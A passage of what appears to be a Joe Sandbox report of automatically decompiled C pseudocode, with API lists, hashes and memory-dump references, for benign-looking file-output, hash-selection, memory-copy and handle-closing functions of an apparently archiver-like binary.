                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00B472D6(void* __ebx, struct _IO_FILE** __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* _t25;
				void* _t26;
				void* _t34;
				struct _IO_FILE** _t59;
				void* _t65;

				L00B7F140(E00B86154, _t65);
				_t59 = __ecx;
				E00B12D90(_t65 - 0x24);
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				_t25 = L00B3D6D2(__ebx, _t65 - 0x24,  *((intOrPtr*)(_t65 + 0xc)), __edx, 9);
				if( *((intOrPtr*)(_t65 - 0x20)) != 0) {
					E00B126D9(_t65 - 0x18);
					 *(_t65 - 4) = 1;
					E00B12D90(_t65 - 0x30);
					 *(_t65 - 4) = 2;
					E00B4633B(__edx,  *((intOrPtr*)(_t65 + 8)), _t59, _t65, _t65 - 0x18, _t65 - 0x30);
					_t72 =  *((intOrPtr*)(_t65 - 0x14));
					if( *((intOrPtr*)(_t65 - 0x14)) == 0) {
						_push( *((intOrPtr*)(_t65 - 0x30)));
						L00B11FFC(_t59, __eflags);
					} else {
						fputs( *(_t65 - 0x18),  *_t59); // executed
					}
					fputs(" = ",  *_t59); // executed
					_t34 = E00B471EE(_t59,  *((intOrPtr*)(_t65 - 0x24)), _t59, _t72); // executed
					_t25 = E00B11E89(E00B11E89(_t34,  *((intOrPtr*)(_t65 - 0x30))),  *(_t65 - 0x18));
				}
				_t26 = E00B11E89(_t25,  *((intOrPtr*)(_t65 - 0x24)));
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t26;
			}









                                                                                                                    0x00b472db
                                                                                                                    0x00b472e5
                                                                                                                    0x00b472ec
                                                                                                                    0x00b472f4
                                                                                                                    0x00b472fe
                                                                                                                    0x00b47307
                                                                                                                    0x00b4730c
                                                                                                                    0x00b47314
                                                                                                                    0x00b47318
                                                                                                                    0x00b4732a
                                                                                                                    0x00b4732e
                                                                                                                    0x00b47333
                                                                                                                    0x00b4733d
                                                                                                                    0x00b4734a
                                                                                                                    0x00b4734f
                                                                                                                    0x00b4733f
                                                                                                                    0x00b47344
                                                                                                                    0x00b47347
                                                                                                                    0x00b4735b
                                                                                                                    0x00b47364
                                                                                                                    0x00b47374
                                                                                                                    0x00b4737a
                                                                                                                    0x00b4737e
                                                                                                                    0x00b47389
                                                                                                                    0x00b47391

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog
                                                                                                                    • String ID: =
                                                                                                                    • API String ID: 2614055831-2525689732
                                                                                                                    • Opcode ID: 98c0ac878340198f65a2c0e64c6fe20e971a61f38dc89715a0f92931e820a87a
                                                                                                                    • Instruction ID: 4f2392836991b5893b682e1e5463ddeaea92857f9b3fc5fb007b160cf6bcb6e6
                                                                                                                    • Opcode Fuzzy Hash: 98c0ac878340198f65a2c0e64c6fe20e971a61f38dc89715a0f92931e820a87a
                                                                                                                    • Instruction Fuzzy Hash: 48216332904119EFCF05EB94E846AEEBBF5EF44310F24409AF501721A1DF715E95EB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B35DE6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E00B35DE6(void* __ecx, void* __eflags) {
				void* __ebx;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				signed int _t36;
				void* _t43;
				void* _t65;
				void* _t68;
				void* _t73;

				_t73 = __eflags;
				L00B7F140(0xb84e64, _t68);
				_t65 = __ecx;
				L00B35EB8(_t68 - 0x64);
				 *(_t68 - 4) = 0;
				L00B13076(_t68 - 0x54, "Hash");
				 *((intOrPtr*)(_t68 - 0x5c)) = 0xb35ef4;
				 *((intOrPtr*)(_t68 - 0x3c)) = 0xb35f26;
				 *((intOrPtr*)(_t68 - 0x58)) = 0;
				 *((intOrPtr*)(_t68 - 0x64)) = 0x3041;
				_t32 = E00B12D90(_t68 - 0x24);
				 *(_t68 - 4) = 1;
				_t33 = L00B12E16(_t68 - 0x18, "sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum");
				_push(_t32);
				_push(_t33);
				 *(_t68 - 4) = 2;
				_t34 = E00B3683E(_t68 - 0x64, _t73); // executed
				_t35 = E00B11E89(_t34,  *((intOrPtr*)(_t68 - 0x18)));
				 *(_t68 - 4) = 0;
				_t36 = E00B11E89(_t35,  *((intOrPtr*)(_t68 - 0x24)));
				 *((intOrPtr*)(_t68 - 0x34)) = 0;
				 *((char*)(_t68 - 0x38)) = _t36 & 0xffffff00 |  *((intOrPtr*)(_t68 - 0x3c)) != 0x00000000;
				 *((char*)(_t68 - 0x37)) = 1;
				E00B14268(E00B2000A(_t68 - 0x30,  *((intOrPtr*)(_t68 - 0x3c))), 0);
				E00B56B33(_t65 + 8);
				_push(_t68 - 0x64);
				E00B362D5(_t65 + 8);
				 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
				_t43 = L00B35F61(0, _t68 - 0x64);
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return _t43;
			}













                                                                                                                    0x00b35de6
                                                                                                                    0x00b35deb
                                                                                                                    0x00b35df5
                                                                                                                    0x00b35dfb
                                                                                                                    0x00b35e0a
                                                                                                                    0x00b35e0d
                                                                                                                    0x00b35e15
                                                                                                                    0x00b35e1c
                                                                                                                    0x00b35e23
                                                                                                                    0x00b35e26
                                                                                                                    0x00b35e2d
                                                                                                                    0x00b35e3c
                                                                                                                    0x00b35e40
                                                                                                                    0x00b35e45
                                                                                                                    0x00b35e46
                                                                                                                    0x00b35e4a
                                                                                                                    0x00b35e4e
                                                                                                                    0x00b35e56
                                                                                                                    0x00b35e5e
                                                                                                                    0x00b35e61
                                                                                                                    0x00b35e6b
                                                                                                                    0x00b35e74
                                                                                                                    0x00b35e77
                                                                                                                    0x00b35e83
                                                                                                                    0x00b35e8d
                                                                                                                    0x00b35e97
                                                                                                                    0x00b35e98
                                                                                                                    0x00b35e9d
                                                                                                                    0x00b35ea4
                                                                                                                    0x00b35eaf
                                                                                                                    0x00b35eb7

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B35DEB
                                                                                                                      • Part of subcall function 00B3683E: __EH_prolog.LIBCMT ref: 00B36843
                                                                                                                      • Part of subcall function 00B3683E: wcscmp.MSVCRT ref: 00B368D0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                      • Part of subcall function 00B56B33: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B56B59
                                                                                                                      • Part of subcall function 00B362D5: __EH_prolog.LIBCMT ref: 00B362DA
                                                                                                                      • Part of subcall function 00B35F61: __EH_prolog.LIBCMT ref: 00B35F66
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrowfreewcscmp
                                                                                                                    • String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
                                                                                                                    • API String ID: 4250029832-3656212537
                                                                                                                    • Opcode ID: 5307d3ffe659b97e46bea081835526e7b99454f3dcc4d46dcc3830dae1bbbf3d
                                                                                                                    • Instruction ID: c7ca4c78729bd08bf541034fff0a7964fe224b9f6276071cc7242d5abe3342d7
                                                                                                                    • Opcode Fuzzy Hash: 5307d3ffe659b97e46bea081835526e7b99454f3dcc4d46dcc3830dae1bbbf3d
                                                                                                                    • Instruction Fuzzy Hash: 1D214772D01388AECB08EBE4D9969EDBBF5AF55310F6041ADE80577292DB740E48CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B47170 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B47170(struct _IO_FILE** __ecx, char* __edx) {
				void* __edi;
				void* _t20;
				struct _IO_FILE** _t35;
				void* _t37;

				L00B7F140(E00B8611C, _t37);
				_t35 = __ecx;
				fputs(__edx,  *__ecx); // executed
				fputs(" = ",  *_t35); // executed
				_t43 =  *((char*)(_t37 + 0xc));
				if( *((char*)(_t37 + 0xc)) == 0) {
					E00B12DD3(_t37 - 0x18,  *((intOrPtr*)(_t37 + 8)));
					_t5 = _t37 - 4;
					 *_t5 =  *(_t37 - 4) & 0x00000000;
					__eflags =  *_t5;
					E00B120E3(_t35, _t37 - 0x18);
					_push( *((intOrPtr*)(_t37 - 0x18)));
					L00B11FFC(_t35, __eflags); // executed
					_t20 = E00B11E89(E00B11FE9(_t35),  *((intOrPtr*)(_t37 - 0x18)));
				} else {
					_t20 = E00B471EE(_t35,  *((intOrPtr*)(_t37 + 8)), fputs, _t43);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t20;
			}







                                                                                                                    0x00b47175
                                                                                                                    0x00b4717e
                                                                                                                    0x00b4718a
                                                                                                                    0x00b47193
                                                                                                                    0x00b47198
                                                                                                                    0x00b4719c
                                                                                                                    0x00b471b0
                                                                                                                    0x00b471b5
                                                                                                                    0x00b471b5
                                                                                                                    0x00b471b5
                                                                                                                    0x00b471bf
                                                                                                                    0x00b471c6
                                                                                                                    0x00b471c9
                                                                                                                    0x00b471d8
                                                                                                                    0x00b4719e
                                                                                                                    0x00b471a3
                                                                                                                    0x00b471a3
                                                                                                                    0x00b471e3
                                                                                                                    0x00b471eb

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B47175
                                                                                                                    • fputs.MSVCRT ref: 00B4718A
                                                                                                                    • fputs.MSVCRT ref: 00B47193
                                                                                                                      • Part of subcall function 00B471EE: __EH_prolog.LIBCMT ref: 00B471F3
                                                                                                                      • Part of subcall function 00B471EE: fputs.MSVCRT ref: 00B47230
                                                                                                                      • Part of subcall function 00B471EE: fputs.MSVCRT ref: 00B47266
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog
                                                                                                                    • String ID: =
                                                                                                                    • API String ID: 2614055831-2525689732
                                                                                                                    • Opcode ID: c7ced3daa460701ec6d102ff03c2aed6486d4982cc2909aa7c8fab2200a0d436
                                                                                                                    • Instruction ID: af3e0f8f2ed73fc8a3178c4fdd647abe18f98fc2f1cf66f67b983064550b5ded
                                                                                                                    • Opcode Fuzzy Hash: c7ced3daa460701ec6d102ff03c2aed6486d4982cc2909aa7c8fab2200a0d436
                                                                                                                    • Instruction Fuzzy Hash: 7C018632A04009ABCF15BB68D856EEE7BF5EF84710F1080AAF501661A1CF754A96DFD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5EF23 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00B5EF23(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void** _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t24;
				signed int _t34;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t43;
				intOrPtr _t46;
				signed int _t47;
				intOrPtr* _t49;
				void* _t51;

				_t43 = __edx;
				_t36 = __ecx;
				_t34 = _a4[1];
				_t49 = __ecx;
				if(_t34 == 0) {
					L8:
					return _t49;
				} else {
					_t46 =  *((intOrPtr*)(__ecx + 4));
					if(_t46 >= 0x7fffffff) {
						L9:
						_push(0xb8ffc8);
						_push( &_a4);
						_a4 = 0x7e5;
						L00B7F160();
						L00B7F140(0xb87a36, _t51);
						_push(_t36);
						_push(0x228);
						_t38 = E00B11E55();
						_v20 = _t38;
						_t24 = 0;
						_v8 = 0;
						if(_t38 != 0) {
							_t24 = E00B57CDD(_t38, _t43); // executed
						}
						 *[fs:0x0] = _v16;
						return _t24;
					} else {
						_t36 = 0x7fffffff - _t46;
						if(_t34 > 0x7fffffff) {
							goto L9;
						} else {
							_t47 = _t46 + _t34;
							if(_t47 >  *((intOrPtr*)(__ecx + 8))) {
								if(_t47 > 0x7fffffff) {
									_push(0xb8ffc8);
									_push( &_a4);
									_a4 = 0x7e5;
									L00B7F160();
								}
								E00B56BF4(_t49, _t47);
							}
							memcpy( *_t49 +  *(_t49 + 4) * 8,  *_a4, _t34 << 3);
							 *(_t49 + 4) = _t47;
							goto L8;
						}
					}
				}
			}
















                                                                                                                    0x00b5ef23
                                                                                                                    0x00b5ef23
                                                                                                                    0x00b5ef2c
                                                                                                                    0x00b5ef2f
                                                                                                                    0x00b5ef33
                                                                                                                    0x00b5ef90
                                                                                                                    0x00b5ef96
                                                                                                                    0x00b5ef35
                                                                                                                    0x00b5ef35
                                                                                                                    0x00b5ef3f
                                                                                                                    0x00b5ef99
                                                                                                                    0x00b5ef9c
                                                                                                                    0x00b5efa1
                                                                                                                    0x00b5efa2
                                                                                                                    0x00b5efa9
                                                                                                                    0x00b5efb3
                                                                                                                    0x00b5efb8
                                                                                                                    0x00b5efb9
                                                                                                                    0x00b5efc4
                                                                                                                    0x00b5efc6
                                                                                                                    0x00b5efc9
                                                                                                                    0x00b5efcd
                                                                                                                    0x00b5efd0
                                                                                                                    0x00b5efd2
                                                                                                                    0x00b5efd2
                                                                                                                    0x00b5efda
                                                                                                                    0x00b5efe2
                                                                                                                    0x00b5ef41
                                                                                                                    0x00b5ef43
                                                                                                                    0x00b5ef47
                                                                                                                    0x00000000
                                                                                                                    0x00b5ef49
                                                                                                                    0x00b5ef49
                                                                                                                    0x00b5ef4e
                                                                                                                    0x00b5ef52
                                                                                                                    0x00b5ef57
                                                                                                                    0x00b5ef5c
                                                                                                                    0x00b5ef5d
                                                                                                                    0x00b5ef64
                                                                                                                    0x00b5ef64
                                                                                                                    0x00b5ef6c
                                                                                                                    0x00b5ef6c
                                                                                                                    0x00b5ef85
                                                                                                                    0x00b5ef8d
                                                                                                                    0x00000000
                                                                                                                    0x00b5ef8d
                                                                                                                    0x00b5ef47
                                                                                                                    0x00b5ef3f

                                                                                                                    APIs
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B5EF64
                                                                                                                    • memcpy.MSVCRT ref: 00B5EF85
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B5EFA9
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B5EFB3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrow$H_prologmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3273695820-0
                                                                                                                    • Opcode ID: 368f0ba42ad015ac7cdfa2a7e00d8563c7275182bfc20416c5c946ec77c90fd2
                                                                                                                    • Instruction ID: db86194e3f16d1caf97789ac31627c1c3ba175a703a90487603a2e329d468ec7
                                                                                                                    • Opcode Fuzzy Hash: 368f0ba42ad015ac7cdfa2a7e00d8563c7275182bfc20416c5c946ec77c90fd2
                                                                                                                    • Instruction Fuzzy Hash: 2911DD767002499FDB14EFA8C441A6EB7D8EB44745B1085FEF529D7250DE70E904C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B77DB0 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B77DB0(void** __ecx) {
				long _t2;
				void* _t3;
				long _t4;
				int _t6;
				signed int _t7;
				signed int _t8;
				void** _t11;

				_t11 = __ecx;
				_t2 = WaitForSingleObject( *__ecx, 0xffffffff);
				if(_t2 != 0xffffffff) {
					L3:
					_t8 = _t2;
					L4:
					_t3 =  *_t11;
					if(_t3 == 0) {
						L9:
						_t4 = 0;
						L10:
						if(_t8 == 0) {
							return _t4;
						}
						return _t8;
					}
					_t6 = FindCloseChangeNotification(_t3); // executed
					if(_t6 != 0) {
						 *_t11 = 0;
						goto L9;
					}
					_t4 = GetLastError();
					if(_t4 == 0) {
						_t4 = 1;
					}
					goto L10;
				}
				_t2 = GetLastError();
				if(_t2 != 0) {
					goto L3;
				}
				_t8 = _t7 | 0xffffffff;
				goto L4;
			}










                                                                                                                    0x00b77db3
                                                                                                                    0x00b77dba
                                                                                                                    0x00b77dc9
                                                                                                                    0x00b77dd6
                                                                                                                    0x00b77dd6
                                                                                                                    0x00b77dd8
                                                                                                                    0x00b77dd8
                                                                                                                    0x00b77ddc
                                                                                                                    0x00b77dfc
                                                                                                                    0x00b77dfc
                                                                                                                    0x00b77dfe
                                                                                                                    0x00b77e00
                                                                                                                    0x00b77e07
                                                                                                                    0x00b77e07
                                                                                                                    0x00000000
                                                                                                                    0x00b77e02
                                                                                                                    0x00b77ddf
                                                                                                                    0x00b77de7
                                                                                                                    0x00b77df6
                                                                                                                    0x00000000
                                                                                                                    0x00b77df6
                                                                                                                    0x00b77de9
                                                                                                                    0x00b77ded
                                                                                                                    0x00b77def
                                                                                                                    0x00b77def
                                                                                                                    0x00000000
                                                                                                                    0x00b77ded
                                                                                                                    0x00b77dcb
                                                                                                                    0x00b77dcf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b77dd1
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,00B29905), ref: 00B77DBA
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00B29905), ref: 00B77DCB
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00B29905), ref: 00B77DDF
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00B29905), ref: 00B77DE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$ChangeCloseFindNotificationObjectSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 414953474-0
                                                                                                                    • Opcode ID: 9f0e47e1d915bbc131b0725badc0943b1e98f307a13f883596c41c2507e43fb8
                                                                                                                    • Instruction ID: 3b8b5670550787bbb001835ab053b7a44c707cf3d554af64b5e0c88a0b190e08
                                                                                                                    • Opcode Fuzzy Hash: 9f0e47e1d915bbc131b0725badc0943b1e98f307a13f883596c41c2507e43fb8
                                                                                                                    • Instruction Fuzzy Hash: AEF05EB134820247DB305ABD9C84F7666D8EF463B8B2447B6E838D31E0EE60CC4097A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B30E95 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E00B30E95(intOrPtr __ecx, intOrPtr __edx) {
				signed int _t425;
				signed int* _t427;
				signed int _t428;
				intOrPtr* _t433;
				signed int _t434;
				intOrPtr* _t435;
				intOrPtr _t449;
				signed int _t452;
				void* _t456;
				signed int _t463;
				signed int _t465;
				signed char _t470;
				signed int _t472;
				signed int _t477;
				signed int _t481;
				signed int _t488;
				signed int _t493;
				signed int _t495;
				signed int _t504;
				intOrPtr _t506;
				void* _t514;
				signed int _t516;
				signed int _t518;
				signed int _t522;
				signed char _t526;
				void* _t532;
				intOrPtr* _t539;
				signed int _t543;
				signed int _t551;
				signed int _t554;
				void* _t560;
				signed int* _t570;
				signed int _t572;
				signed int _t583;
				signed int _t614;
				intOrPtr* _t623;
				intOrPtr* _t638;
				signed int _t654;
				signed int _t655;
				char* _t671;
				signed int _t679;
				intOrPtr _t681;
				void* _t694;
				signed int _t696;
				signed int _t697;
				intOrPtr* _t699;
				signed int _t702;
				signed int _t703;
				void* _t705;
				signed int _t711;
				signed int _t713;
				void* _t714;

				L00B7F140(E00B848FD, _t714);
				_t570 =  *(_t714 + 0x30);
				_t570[0xc] = 0;
				_t570[0xa] = 0;
				_t570[8] = 0;
				_t570[6] = 0;
				_t570[4] = 0;
				_t570[2] = 0;
				 *_t570 = 0;
				 *((intOrPtr*)(_t714 - 0xb0)) = __edx;
				 *((intOrPtr*)(_t714 - 0x34)) = __ecx;
				_t570[0xd] = 0;
				_t570[0xb] = 0;
				_t570[9] = 0;
				_t570[7] = 0;
				_t570[5] = 0;
				_t570[3] = 0;
				_t570[1] = 0;
				 *(_t714 - 0x30) = 0;
				 *(_t714 - 0x2c) = 0;
				 *((intOrPtr*)(_t714 - 0x40)) = 0;
				 *(_t714 - 0x3c) = 0;
				 *((intOrPtr*)(_t714 - 0x38)) = 0;
				_t425 =  *(_t714 + 0x18);
				 *(_t714 - 4) = 0;
				if( *((char*)(_t425 + 0x3c)) == 0) {
					_t425 =  *( *((intOrPtr*)(_t714 + 0xc)) + 4);
					 *(_t714 - 0x1c) = _t425;
				} else {
					 *(_t714 - 0x1c) = 1;
				}
				 *(_t714 - 0x18) = 0;
				if( *(_t714 - 0x1c) <= 0) {
					L9:
					_t696 =  *(_t714 - 0x1c);
					 *(_t714 - 0x20) = 0;
					if(_t696 != 0) {
						 *(_t714 - 0x20) = E00B11E55();
					}
					 *(_t714 - 4) = 3;
					if(_t696 > 0) {
						_t654 =  *(_t714 - 0x1c);
						_t705 =  *(_t714 - 0x20);
						_t655 = _t654 >> 2;
						memset(_t705 + _t655, memset(_t705, 0, _t655 << 2), (_t654 & 0x00000003) << 0);
					}
					_push(0x200);
					_t427 = E00B11E55();
					 *(_t714 + 0x30) = _t427;
					_t732 = _t427;
					 *(_t714 - 4) = 4;
					if(_t427 == 0) {
						_t711 = 0;
						__eflags = 0;
					} else {
						_t543 = E00B22F49(_t427, _t732); // executed
						_t711 = _t543;
					}
					_t697 = 0;
					 *(_t714 - 4) = 3;
					 *(_t714 - 0x114) = _t711;
					if(_t711 != 0) {
						 *((intOrPtr*)( *_t711 + 4))(_t711);
					}
					_t428 =  *(_t714 + 0x18);
					 *(_t714 - 4) = 5;
					 *((intOrPtr*)(_t711 + 0x174)) =  *((intOrPtr*)(_t428 + 0x10));
					 *((char*)(_t714 + 0x33)) =  *(_t714 - 0x1c) - 1 > 0;
					 *(_t711 + 0x35) =  *(_t711 + 0x35) & 0x00000000;
					 *(_t714 - 0x14) =  *(_t428 + 8);
					 *(_t711 + 0x1a8) = _t697;
					 *((char*)(_t711 + 0x40)) =  *((intOrPtr*)(_t714 + 0x33));
					 *(_t711 + 0x1a0) = _t697;
					 *(_t711 + 0x198) = _t697;
					 *(_t711 + 0x190) = _t697;
					 *(_t711 + 0x188) = _t697;
					 *(_t711 + 0x44) =  *(_t714 - 0x14);
					 *((intOrPtr*)(_t711 + 0x48)) =  *((intOrPtr*)(_t428 + 0xc));
					 *(_t711 + 0x1ac) = _t697;
					 *(_t711 + 0x1a4) = _t697;
					 *(_t711 + 0x19c) = _t697;
					 *(_t711 + 0x194) = _t697;
					 *(_t711 + 0x18c) = _t697;
					L00B31A21(_t711,  *(_t714 + 0x28));
					if( *((char*)(_t714 + 0x33)) == 0) {
						L28:
						 *(_t714 - 0xd) =  *(_t714 - 0xd) & 0x00000000;
						__eflags =  *(_t714 - 0x1c) - _t697;
						 *(_t714 - 0x28) = _t697;
						 *(_t714 - 0x24) = _t697;
						 *(_t714 - 0x18) = _t697;
						if( *(_t714 - 0x1c) <= _t697) {
							L84:
							__eflags =  *((char*)(_t714 + 0x33));
							if( *((char*)(_t714 + 0x33)) != 0) {
								L86:
								_t433 =  *((intOrPtr*)(_t714 + 0x24));
								_t434 =  *((intOrPtr*)( *_t433 + 0xc))(_t433,  *(_t714 - 0x30),  *(_t714 - 0x2c));
								__eflags = _t434 - _t697;
								 *(_t714 + 0x18) = _t434;
								if(_t434 == _t697) {
									_t435 =  *((intOrPtr*)(_t714 + 0x24));
									_t436 =  *((intOrPtr*)( *_t435 + 0x10))(_t435, _t714 - 0x28);
									__eflags = _t436 - _t697;
									 *(_t714 + 0x18) = _t436;
									if(_t436 == _t697) {
										L110:
										 *(_t714 - 4) = 3;
										_t570[8] =  *(_t711 + 0x188);
										_t570[9] =  *(_t711 + 0x18c);
										_t570[0xa] =  *(_t711 + 0x190);
										_t570[0xb] =  *(_t711 + 0x194);
										_t570[0xc] =  *(_t711 + 0x198);
										_t570[0xd] =  *(_t711 + 0x19c);
										_t570[2] =  *(_t711 + 0x1a0);
										_t570[3] =  *(_t711 + 0x1a4);
										_t570[4] =  *(_t711 + 0x1a8);
										_t570[5] =  *(_t711 + 0x1ac);
										__eflags = _t711 - _t697;
										 *_t570 =  *( *((intOrPtr*)(_t714 + 0xc)) + 4);
										_t570[1] = _t697;
										_t449 =  *((intOrPtr*)(_t711 + 0x180));
										_t570[6] =  *(_t449 + 0x20);
										_t436 =  *(_t449 + 0x24);
										_t570[7] =  *(_t449 + 0x24);
										L111:
										if(__eflags != 0) {
											_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
										}
										goto L113;
									}
									__eflags = _t711 - _t697;
									 *(_t714 - 4) = 3;
									if(_t711 != _t697) {
										_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
									}
									_t697 =  *(_t714 + 0x18);
									goto L113;
								}
								__eflags = _t711 - _t697;
								 *(_t714 - 4) = 3;
								if(_t711 != _t697) {
									_t436 =  *((intOrPtr*)( *_t711 + 8))(_t711);
								}
								_t697 =  *(_t714 + 0x18);
								goto L113;
							}
							__eflags =  *(_t714 - 0xd);
							if( *(_t714 - 0xd) == 0) {
								goto L110;
							}
							goto L86;
						} else {
							goto L29;
						}
						do {
							L29:
							_t456 =  *(_t714 - 0x20);
							_t583 =  *(_t714 - 0x18);
							__eflags =  *((char*)(_t456 + _t583));
							if( *((char*)(_t456 + _t583)) != 0) {
								goto L82;
							}
							L00B234D6(_t711);
